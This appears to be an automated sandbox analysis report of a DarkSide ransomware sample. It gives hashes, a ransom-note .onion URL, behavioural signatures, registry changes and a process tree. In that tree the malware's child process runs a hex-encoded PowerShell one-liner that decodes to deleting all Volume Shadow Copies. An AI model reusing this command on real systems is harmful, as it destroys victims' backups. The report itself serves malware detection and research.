Overview
overview
10Static
static
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
7Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
9Ransomware...KB.exe
windows10-ltsc_2021-x64
9Ransomware...KB.ps1
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Ransomware...KB.msi
windows10-ltsc_2021-x64
10Ransomware...KB.exe
windows10-ltsc_2021-x64
10Resubmissions
31/03/2025, 00:22
250331-apdw1ssjs8 1028/03/2025, 22:52
250328-2tfd7avl15 1025/03/2025, 14:57
250325-sb3mbsxxht 10Analysis
-
max time kernel
488s -
max time network
487s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
31/03/2025, 00:22
Static task
static1
Behavioral task
behavioral1
Sample
RansomwareSamples/Avaddon_09_06_2020_1054KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral2
Sample
RansomwareSamples/Avos_18_07_2021_403KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral3
Sample
RansomwareSamples/Babik_04_01_2021_31KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral4
Sample
RansomwareSamples/Babuk_20_04_2021_79KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral5
Sample
RansomwareSamples/BlackKingdom_23_03_2021_12460KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral6
Sample
RansomwareSamples/BlackMatter_02_08_2021_67KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral7
Sample
RansomwareSamples/Conti_22_12_2020_186KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral8
Sample
RansomwareSamples/Cuba_08_03_2021_1130KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral9
Sample
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral10
Sample
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral11
Sample
RansomwareSamples/DarkSide_18_11_2020_17KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral12
Sample
RansomwareSamples/DearCry_13_03_2021_1292KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral13
Sample
RansomwareSamples/Hades_29_03_2021_1909KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral14
Sample
RansomwareSamples/Hive_17_07_2021_808KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
RansomwareSamples/LockBit_14_02_2021_146KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral16
Sample
RansomwareSamples/MAKOP_27_10_2020_115KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral17
Sample
RansomwareSamples/MedusaLocker_24_04_2020_661KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral18
Sample
RansomwareSamples/MountLocker_20_11_2020_200KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral19
Sample
RansomwareSamples/Nefilim_31_08_2020_3061KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral20
Sample
RansomwareSamples/Nemty_03_02_2021_124KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral21
Sample
RansomwareSamples/NetWalker_19_10_2020_903KB.ps1
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral22
Sample
RansomwareSamples/Phoenix_29_03_2021_1930KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral23
Sample
RansomwareSamples/PwndLocker_04_03_2020_17KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral24
Sample
RansomwareSamples/Pysa_08_04_2021_500KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral25
Sample
RansomwareSamples/REvil_07_04_2021_121KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral26
Sample
RansomwareSamples/REvil_08_04_2021_121KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral27
Sample
RansomwareSamples/Ragnar_11_02_2020_40KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral28
Sample
RansomwareSamples/RansomEXX_14_12_2020_156KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral29
Sample
RansomwareSamples/Ranzy_20_11_2020_138KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral30
Sample
RansomwareSamples/Ryuk_21_03_2021_274KB.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral31
Sample
RansomwareSamples/Sekhmet_30_03_2020_364KB.msi
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral32
Sample
RansomwareSamples/Sodinokibi_04_07_2019_253KB.exe
Resource
win10ltsc2021-20250314-en
Errors
General
-
Target
RansomwareSamples/DarkSide_16_01_2021_59KB.exe
-
Size
59KB
-
MD5
0ed51a595631e9b4d60896ab5573332f
-
SHA1
7ae73b5e1622049380c9b615ce3b7f636665584b
-
SHA256
243dff06fc80a049f4fb37292f8b8def0fce29768f345c88ee10699e22b0ae60
-
SHA512
9bfd6318b120c05d9a42a456511efc59f2be5ad451baa6d19d5de776e2ff74dbee444c85478ee7cfdbf705517cc147cd64c6814965f76c740fe1924594a37cb5
-
SSDEEP
768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3RYY23W58:0x7Fu4/ihrhDTV1ylhZ58
Malware Config
Extracted
C:\Recovery\WindowsRE\README.9a401f55.TXT
darkside
http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (151) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 2352 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\9a401f55.BMP" DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\9a401f55.BMP" DarkSide_16_01_2021_59KB.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\CbsTemp TiWorker.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkSide_16_01_2021_59KB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\Desktop\WallpaperStyle = "10" DarkSide_16_01_2021_59KB.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "125" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.9a401f55 DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.9a401f55\ = "9a401f55" DarkSide_16_01_2021_59KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\9a401f55\DefaultIcon DarkSide_16_01_2021_59KB.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\9a401f55 DarkSide_16_01_2021_59KB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\9a401f55\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\9a401f55.ico" DarkSide_16_01_2021_59KB.exe Key created \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000_Classes\Extensions\ContractId\Windows.Protocol\PackageId CastSrv.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 3592 NOTEPAD.EXE 4212 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2352 powershell.exe 2352 powershell.exe 2444 DarkSide_16_01_2021_59KB.exe 2444 DarkSide_16_01_2021_59KB.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2376 bootim.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeSecurityPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeTakeOwnershipPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeLoadDriverPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeSystemProfilePrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeSystemtimePrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeProfSingleProcessPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeIncBasePriorityPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeCreatePagefilePrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeBackupPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeRestorePrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeShutdownPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeDebugPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeSystemEnvironmentPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeRemoteShutdownPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeUndockPrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: SeManageVolumePrivilege 2444 DarkSide_16_01_2021_59KB.exe Token: 33 2444 DarkSide_16_01_2021_59KB.exe Token: 34 2444 DarkSide_16_01_2021_59KB.exe Token: 35 2444 DarkSide_16_01_2021_59KB.exe Token: 36 2444 DarkSide_16_01_2021_59KB.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeBackupPrivilege 1876 vssvc.exe Token: SeRestorePrivilege 1876 vssvc.exe Token: SeAuditPrivilege 1876 vssvc.exe Token: SeDebugPrivilege 5848 taskmgr.exe Token: SeSystemProfilePrivilege 5848 taskmgr.exe Token: SeCreateGlobalPrivilege 5848 taskmgr.exe Token: 33 5848 taskmgr.exe Token: SeIncBasePriorityPrivilege 5848 taskmgr.exe Token: SeSecurityPrivilege 1052 TiWorker.exe Token: SeRestorePrivilege 1052 TiWorker.exe Token: SeBackupPrivilege 1052 TiWorker.exe Token: 33 4920 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4920 AUDIODG.EXE Token: SeBackupPrivilege 4916 SystemSettingsAdminFlows.exe Token: SeRestorePrivilege 4916 SystemSettingsAdminFlows.exe Token: SeSystemEnvironmentPrivilege 4916 SystemSettingsAdminFlows.exe Token: SeSecurityPrivilege 1052 TiWorker.exe Token: SeRestorePrivilege 1052 TiWorker.exe Token: SeBackupPrivilege 1052 TiWorker.exe Token: SeSystemEnvironmentPrivilege 2376 bootim.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 4212 NOTEPAD.EXE 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SendNotifyMessage 42 IoCs
pid Process 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 116 OpenWith.exe 4916 SystemSettingsAdminFlows.exe 5688 LogonUI.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2444 wrote to memory of 2352 2444 DarkSide_16_01_2021_59KB.exe 82 PID 2444 wrote to memory of 2352 2444 DarkSide_16_01_2021_59KB.exe 82 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.9a401f55.TXT1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:4212
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:116
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\CompleteProtect.svg.txt1⤵
- Opens file in notepad (likely ransom note)
PID:3592
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5848
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5196
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:5756
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:1156
-
C:\Windows\System32\CastSrv.exeC:\Windows\System32\CastSrv.exe CCastServerControlInteractiveUser -Embedding1⤵
- Modifies registry class
PID:1496
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:4004
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4b4 0x3241⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal1⤵PID:5060
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" TurnOffDevicePortal1⤵PID:4100
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" FeaturedResetPC1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4916
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa398a055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5688
-
C:\Windows\system32\bootim.exebootim.exe /startpage:11⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2376
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4e176b40c4ea17f4870c34fad926d6e
SHA12cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0
SHA2567ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c
SHA512feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471
-
Filesize
3KB
MD54521e67a3b03b060fde700c36d3b9297
SHA14a730cd86dc7a57ac001d59853dd500c1b83b4ab
SHA256a72aa223a84c4fa011c8a2b0ef2475a83d5123de2cdfa6a7160231729e68383d
SHA51290235850eef71c2f0921d04e6990147af9e76fec8ee49e12e6a5bab065ff0e63331a54be845026f17a7b1dd230ee94843099db4813c127c6bafb8cbaf59b753f
-
Filesize
1KB
MD575c7d4a084b3113fb3aeac7d33a681c6
SHA1689bbd08e3bbb66ada48dcac1b767c673d33f6c0
SHA256355e7f6e3e8d956e6d33ddd6f0bb7bd9b2c81eaf7ed99e74145b2d3f65a6977d
SHA512e1a9340e40d402fe493c7642348db22c6721a43f75822871e82abc34fdd09350dd301097202ae1eb4a39b2d8fb7a3a270617978170389860a74bc1b6ea9199c8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
625KB
MD563e6df8afefc85f644bb27bd3fc47b63
SHA19538028935d56397adad6893bbcd99285e480039
SHA2569ef580e129104e99d400b722d44d07ff614bbb4a1028e26e94cfe87bb6c13ce5
SHA51272ee70d52d749ead1e7e0019481b1e49c542d916c4e8f13be3b1dab0e7b19977473eebacdd04b0a69817d58056ec2049b48bfdf0abacab3008a409c40115454a